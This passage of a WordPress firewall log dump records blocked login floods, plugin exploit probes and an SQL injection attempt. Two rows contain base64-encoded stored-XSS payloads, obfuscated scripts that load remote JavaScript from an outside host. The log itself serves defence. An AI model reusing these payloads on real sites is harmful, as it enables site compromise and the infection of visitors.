Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7755,1564584290.431154,1564584289.253100,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7756,1564584288.151714,1564584286.978600,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7757,1564584285.475321,1564584284.431200,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7758,1564584283.658541,1564584283.224700,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7759,1564584282.549259,1564584282.031200,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7760,1564584281.351964,1564584280.850900,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7761,1564584280.061346,1564584279.759300,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7762,1564584279.104054,1564584278.612300,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7763,1564584277.896547,1564584277.394600,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7764,1564584276.611972,1564584276.033800,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7765,1564584275.289272,1564584274.768700,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7766,1564584274.040913,1564584273.568500,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7767,1564584272.909476,1564584272.317000,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7768,1564584271.596584,1564584270.989900,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7769,1564584270.284221,1564584269.684500,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7770,1564584268.967829,1564584268.065700,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7771,1564584267.218153,1564584266.445700,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7772,1564584265.430759,1564584264.692000,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7773,1564584263.619098,1564584262.559500,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7774,1564584261.741715,1564584260.925300,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7775,1564584260.165075,1564584259.258600,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7776,1564584257.969078,1564584257.277500,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7777,1564584256.388315,1564584255.596600,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7778,1564590310.641756,1564590309.778500,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7779,1564590307.633118,1564590305.610400,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7780,1564590303.163511,1564590302.581700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7781,1564590301.443722,1564590300.727000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7816,1564591626.189492,1564591625.757100,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7782,1564590299.561292,1564590298.457100,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7783,1564590297.210334,1564590296.212200,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7784,1564590294.653641,1564590293.646300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8061,1564682631.299203,1564682629.385200,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgYXN5bmM9dHJ1ZSB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBudCA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTgsMTAxLDExNCwxMTYsNTQpO3ZhciBtYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsIDEwNiwgOTcsIDEyMCwgNjcsIDExMSwgMTE3LCAxMTAsIDExNiwgMTAxLCAxMTQpO3ZhciBzYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgamIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwgMTE2LCAxMTYsIDExMiwgMTE1LCA1OCwgNDcsIDQ3KTsgdmFyIHRiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsIDEwMSwgMTIwLCAxMTYsIDQ3LCAxMDYsIDk3LCAxMTgsIDk3LCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBsYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTAzLDk3LDk4LDExNCwxMDUsMTAxLDEwOCwxMDgsOTcsMTA4LDExMSwxMTgsMTAxLDk5LDk3LDExNiwxMTUsNDYsOTksMTExLDEwOSw0NywxMDgsMTExLDExMCwxMDEsNDYsMTA2LDExNSw2MywxMjIsMTExLDExMCwxMDEsMTA1LDEwMCw2MSw1Niw1Nyw1NCw1Myw1Miw1MSw1MCwzOCwxMTcsMTE2LDEwOSw5NSw5OSw2MSw1MiwzOCwxMDksMTE0LDExMSw2MSk7dmFyIGM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChzYik7Yy50eXBlPXRiLGMuYXN5bmM9MSxjLnNyYz1qYitsYitudDt2YXIgbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShzYilbMF07bi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShjLG4pOzwvc2NyaXB0PjxzY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7785,1564590291.703808,1564590290.967300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8118,1564715948.495955,1564715948.077600,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(7817,1564591625.018117,1564591624.572600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7786,1564590880.715606,1564590879.338700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7941,0.000000,1564624069.610648,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7942,1564624127.779653,1564624127.351200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7943,1564624126.942690,1564624126.554100,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7944,1564624126.176885,1564624125.813000,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7945,1564624125.384181,1564624124.966500,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7946,1564624124.584907,1564624124.174800,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7947,1564624123.793504,1564624123.338400,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7948,1564624122.902208,1564624122.550000,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security 